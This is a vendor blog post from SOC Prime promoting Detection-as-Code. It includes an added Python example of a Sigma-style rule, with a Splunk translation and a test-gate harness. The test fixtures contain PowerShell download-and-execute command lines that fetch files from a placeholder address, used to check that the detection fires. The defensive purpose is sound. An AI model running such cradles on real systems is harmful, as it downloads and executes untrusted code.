Detection-as-Code: The Real Deal or Another Trend?

SOC Prime
5 min read · May 5, 2022


As you might already have guessed, the Detection as Code (DaC) concept is fundamental to the SOC Prime Platform. And what other topic could we choose for our very first Medium story? You might expect yet another Detection-as-Code fairytale, but that is not quite what follows.

Is Detection-as-Code worth your time?

According to Anton Chuvakin, DaC did to security what DevOps did to IT. Indeed, Detection as Code is not just a set of technologies and procedures but also a promising new cultural model, worth reviewing from every angle to understand its real value. Before any sugar-coating, though, let's start with what raises concerns.

A reality check from your security analyst may sound something like this:

  • All software has vulnerabilities
  • No organization can ever be 100% secure
  • No detection item is 100% accurate

How are you supposed to live with this information now? Let’s figure it out.

Of course, implementing the necessary design practices, processes, and policies is a viable way to deal with an ever-growing threat landscape. But as soon as you start, you get so busy that there is no time or place left for discussions about "culture". All of this takes a great deal of budget, talent, intelligence, and the ability to use them well…

Sure, in the end detection is code. But as soon as you set out to build an actual CI/CD pipeline for it, you have to handle continuous research, development, QA, version control, deployment, and improvement of every detection item across the whole infrastructure, in small iterations, 24/7/365. At that point it becomes evident that Detection as Code is easier said than done. So is DaC just another futuristic philosophy that is impossible to implement, leaving nothing but surrender to the wisdom of insecurity?

At SOC Prime, we think the insecurity and obsolescence of siloed infrastructures are not a doom but a window of opportunity. That is why we created our platform, gathering a global community of selected security researchers who help make the impossible possible.

Then you might ask: OK, collaborative cyber defense is good, but I could just go to GitHub and get free stuff. How are you different? Let's dive deeper.

Why Do We Need Detection-as-Code?

Let's say you are a US-based company that has to comply with the U.S. federal government's Risk Management Framework (RMF). At the same time, you have to protect your organization from DDoS, information leakage, cyber-espionage, hijacked access, and the other scary things adversaries love so much.

What's even worse? You know that at any given moment there may be zero-day vulnerabilities in the software that runs the whole business. Waiting for an official patch means deliberately exposing your organization to high risk. And deploying patches on critical servers is itself time-consuming and risky, because the possible interruptions can affect stability and performance. A detection for the exploitation behaviour, by contrast, can be written and shipped as soon as that behaviour is known, without touching the vulnerable system at all.

That's when a CI/CD pipeline, specifically in the detection realm, starts looking like a necessity rather than a philosophy. It is clearly better to deploy detections rapidly in a safe and reliable manner. However, internal SOC teams often face too much pressure to keep up.

At the time of writing, the Common Vulnerabilities and Exposures (CVE) list includes 175,296 entries. Only a fraction of them are ever exploited in the wild, but the list itself does not tell you which ones, so the triage still has to be done. Imagine continuously supplying and renewing detections for new exploits of every one of them, plus taking care of a potentially unlimited number of zero-days. Let's be realistic: even the most brilliant cybersecurity team is physically incapable of doing this alone.

SOC Prime’s Approach to Detection-as-Code

Now let's see how SOC Prime addresses the pains and needs of SOC teams with its Detection-as-Code platform.

  • Collaborative cyber defense approach: We launched Threat Bounty, a crowdsourcing initiative that, together with our internal team of prominent detection engineers, creates the world's largest and freshest pool of detections.
  • Test-driven development (TDD) of detection content and continuous QA: Only one-third of the detection items submitted by contributing developers get published on our platform. We supply only rules that pass that review.
  • Version control: Our platform's GUI comes with many functions that simplify tracking and adjusting detection performance in real time.
  • Cross-vendor and cross-tool detection content: All detections come in the vendor-agnostic Sigma format and translate to the native query languages of more than 25 security platforms.
  • Metrics and improvement: Automated, visualized reports make it easy to assess every aspect of the current detection process.
  • CI/CD detection pipeline: We provide a ready-made CI/CD workflow for detections. All you have to do is log in to your SOC Prime account and see what is cooking on the platform right now.
  • Proactive cyber defense: On SOC Prime's Detection as Code platform, SOC teams get the best of both worlds: accurate alerts for known behaviour, and hunting queries that leave more room for imagination and adjustment.
  • Automation: Our Continuous Content Management (CCM) module lets security teams streamline the deployment of up-to-date detection content by customizing and automating the process.
  • Analytics: Every detection item on our platform comes with relevant threat context. Intelligence data and MITRE ATT&CK mapping are available without an expiration date.
  • Code reusability: Detection code can be reused and updated for multiple use cases with the necessary adjustments.
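To make the loop concrete, here is an added example (not SOC Prime's code or the platform's pipeline) of the smallest form of what the CI/CD paragraph above and the TDD, Sigma and CI/CD points describe: a Sigma-style rule held as data, an evaluator for the Sigma subset the rule uses, a hand-written Splunk-style rendering that stands in for cross-vendor translation (it is not Uncoder or sigma-cli), and a set of constructed process-creation events that serve as the test gate a pipeline would run before publishing the rule. The rule, its allow-listed parent process, the events and the 198.51.100.7 address are all constructed for the example.

```python
import re

# Added example, not SOC Prime's code. RULE mirrors the fields of a Sigma YAML file as a
# dict; the evaluator covers only the Sigma subset this rule uses (|endswith, |contains,
# list values as OR, condition "X" or "X and not Y"); to_splunk() is a hand-written
# illustration of cross-vendor translation, not Uncoder or sigma-cli. All events and
# the allow-listed parent process below are constructed for this example.

RULE = {
    "title": "Suspicious PowerShell Download Cradle (constructed example)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["DownloadString", "DownloadFile", "Invoke-WebRequest"],
        },
        # Hypothetical tuning: this parent is assumed to be a legitimate deployment tool.
        "filter": {"ParentImage|endswith": "\\ConfigurationManager.exe"},
        "condition": "selection and not filter",
    },
    "tags": ["attack.execution", "attack.t1059.001"],
}

_COND = re.compile(r"(\w+)(?: and not (\w+))?")  # supported condition forms


def _parse_condition(det):
    """Return (selection_name, filter_name_or_None); reject anything outside the subset."""
    m = _COND.fullmatch(det["condition"])
    if m is None:
        raise ValueError(f"unsupported condition: {det['condition']}")
    return m.groups()


def _value_matches(op, actual, expected):
    """Apply a Sigma field modifier; Sigma string matching is case-insensitive."""
    a, e = str(actual).lower(), str(expected).lower()
    if op == "endswith":
        return a.endswith(e)
    if op == "contains":
        return e in a
    if op == "":
        return a == e
    raise ValueError(f"unsupported modifier: {op}")


def _search_matches(search, event):
    """Fields of one search identifier are ANDed; a list of values for a field is ORed."""
    for key, expected in search.items():
        field, _, op = key.partition("|")
        values = expected if isinstance(expected, list) else [expected]
        if field not in event or not any(_value_matches(op, event[field], v) for v in values):
            return False
    return True


def evaluate(rule, event):
    """True if the event triggers the rule (selection hit and filter not hit)."""
    det = rule["detection"]
    sel, flt = _parse_condition(det)
    hit = _search_matches(det[sel], event)
    return hit and not (flt is not None and _search_matches(det[flt], event))


def to_splunk(rule):
    """Render the same rule as a Splunk-style search: the cross-vendor step, illustrated."""
    def clause(search):
        parts = []
        for key, expected in search.items():
            field, _, op = key.partition("|")
            values = expected if isinstance(expected, list) else [expected]
            alts = []
            for v in values:
                v = v.replace("\\", "\\\\").replace('"', '\\"')
                pat = {"endswith": f"*{v}", "contains": f"*{v}*"}.get(op, v)
                alts.append(f'{field}="{pat}"')
            parts.append("(" + " OR ".join(alts) + ")")
        return " ".join(parts)
    det = rule["detection"]
    sel, flt = _parse_condition(det)
    return clause(det[sel]) + (" NOT " + clause(det[flt]) if flt else "")


TEST_EVENTS = [  # (event, expected verdict): constructed process_creation records
    ({"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "CommandLine": "powershell -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://198.51.100.7/a'))",
      "ParentImage": "C:\\Windows\\System32\\cmd.exe"}, True),       # true positive
    ({"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "CommandLine": "powershell -File C:\\scripts\\backup.ps1",
      "ParentImage": "C:\\Windows\\System32\\cmd.exe"}, False),      # benign PowerShell
    ({"Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
      "CommandLine": "pwsh -c Invoke-WebRequest http://198.51.100.7/x -OutFile x.exe",
      "ParentImage": "C:\\Tools\\ConfigurationManager.exe"}, False),  # suppressed by filter
    ({"Image": "C:\\Windows\\System32\\cmd.exe",
      "CommandLine": "cmd /c echo DownloadString",
      "ParentImage": "C:\\Windows\\explorer.exe"}, False),           # keyword, wrong process
]


def run_tests(rule=RULE, cases=TEST_EVENTS):
    """CI gate: return descriptions of failing cases; an empty list means the rule may ship."""
    failures = []
    for i, (event, expected) in enumerate(cases):
        got = evaluate(rule, event)
        if got != expected:
            failures.append(f"case {i}: expected {expected}, got {got}")
    return failures


if __name__ == "__main__":
    failures = run_tests()
    print(to_splunk(RULE))
    print("rule passed" if not failures else "\n".join(failures))
    raise SystemExit(1 if failures else 0)
```

The point of the third event is the one the TDD bullet is really about: a change to the filter that broke the allow-list, or a change to the selection that no longer catches the first event, fails the gate before the rule reaches any SIEM, and the same test set is reused when the rule is retuned later.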

Veterans in cyber may argue that Detection as Code is nothing new. Yet the concept has become richer and more complex than ever before. Partly that is because attackers never stop trying to find their way around existing detection capabilities. It may also be inevitable that detection processes grow into something bigger, since IT infrastructure has become a vital part of businesses in virtually every sector of the economy. It's up to you whether to treat DaC as the real deal or not. All we can say is that you never know unless you try.
